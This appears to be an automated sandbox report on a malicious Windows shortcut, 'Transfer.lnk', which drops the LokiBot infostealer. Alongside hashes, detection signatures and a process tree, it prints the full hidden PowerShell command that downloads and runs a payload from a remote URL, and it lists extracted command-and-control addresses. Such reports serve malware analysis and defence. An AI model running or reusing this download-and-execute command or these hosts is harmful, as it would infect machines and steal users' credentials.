Analysis
-
max time kernel
131s -
max time network
136s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-10-2024 09:05
Static task
static1
Behavioral task
behavioral1
Sample
Transfer.lnk
Resource
win7-20240903-en
General
-
Target
Transfer.lnk
-
Size
2KB
-
MD5
abc2e2d45fa8e44cd61545da9d207ddb
-
SHA1
ae0425865168ee22735c24c241cf0e095d532347
-
SHA256
d74b5f077d1a2910fb058f56768b3c1de6ab0ba537c2796268887601444fdc2d
-
SHA512
1172c817b40dc65fafb763dbdf7e04c8bc8b69d4963a2259f035ed20b0c7df2d26dc5e1ac82dd1b67d7d320bfb96739594b2fc521a8ae7ed229ebc1e38bf2e84
Malware Config
Extracted
https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe
Extracted
lokibot
http://freighteightonecam.sytes.net/ndifygidj/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 5 2800 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
Ojtjewi.exeOjtjewi.exeOjtjewi.exeOjtjewi.exepid Process 2688 Ojtjewi.exe 456 Ojtjewi.exe 2112 Ojtjewi.exe 1080 Ojtjewi.exe -
Loads dropped DLL 3 IoCs
Processes:
Ojtjewi.exepid Process 2688 Ojtjewi.exe 2688 Ojtjewi.exe 2688 Ojtjewi.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Ojtjewi.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ojtjewi.exe Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Ojtjewi.exe Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ojtjewi.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
Ojtjewi.exedescription pid Process procid_target PID 2688 set thread context of 456 2688 Ojtjewi.exe 32 PID 2688 set thread context of 2112 2688 Ojtjewi.exe 33 PID 2688 set thread context of 1080 2688 Ojtjewi.exe 34 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Ojtjewi.exeOjtjewi.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ojtjewi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ojtjewi.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exeOjtjewi.exeOjtjewi.exedescription pid Process Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2688 Ojtjewi.exe Token: SeDebugPrivilege 2112 Ojtjewi.exe -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
cmd.exepowershell.exeOjtjewi.exedescription pid Process procid_target PID 2440 wrote to memory of 2800 2440 cmd.exe 30 PID 2440 wrote to memory of 2800 2440 cmd.exe 30 PID 2440 wrote to memory of 2800 2440 cmd.exe 30 PID 2800 wrote to memory of 2688 2800 powershell.exe 31 PID 2800 wrote to memory of 2688 2800 powershell.exe 31 PID 2800 wrote to memory of 2688 2800 powershell.exe 31 PID 2800 wrote to memory of 2688 2800 powershell.exe 31 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 456 2688 Ojtjewi.exe 32 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 2112 2688 Ojtjewi.exe 33 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 PID 2688 wrote to memory of 1080 2688 Ojtjewi.exe 34 -
outlook_office_path 1 IoCs
Processes:
Ojtjewi.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Ojtjewi.exe -
outlook_win_path 1 IoCs
Processes:
Ojtjewi.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Ojtjewi.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Transfer.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hiDdEn Hiddden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/jlow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.exe','Ojtjewi.exe');./'Ojtjewi.exe';(get-item 'Ojtjewi.exe').Attributes += 'Hidden';2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\Ojtjewi.exe"C:\Users\Admin\AppData\Local\Temp\Ojtjewi.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\AppData\Local\Temp\Ojtjewi.exeC:\Users\Admin\AppData\Local\Temp\Ojtjewi.exe4⤵
- Executes dropped EXE
PID:456
-
-
C:\Users\Admin\AppData\Local\Temp\Ojtjewi.exeC:\Users\Admin\AppData\Local\Temp\Ojtjewi.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\Ojtjewi.exeC:\Users\Admin\AppData\Local\Temp\Ojtjewi.exe4⤵
- Executes dropped EXE
PID:1080
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
377KB
MD56746fbb343ddec70416177f77ef83c2a
SHA113a2698094e6513427c06721df1cc5de2132d5f4
SHA2565b82fc5190c0d6644a7eabdf20be1dfdd96d7d8a46d3c329ba2a48b96f7e26e6
SHA5124106edbf6a07e209045bdce8286f9cb5c9983afb21551419c32228a4eb1e87c57c88cb7615c67a263d036a892edab1cc6d4f46e33116f65c4405955a7e8cc3a4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-457978338-2990298471-2379561640-1000\0f5007522459c86e95ffcc62f32308f1_7ab03691-fc7c-4787-903d-423aed4b9dc2
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b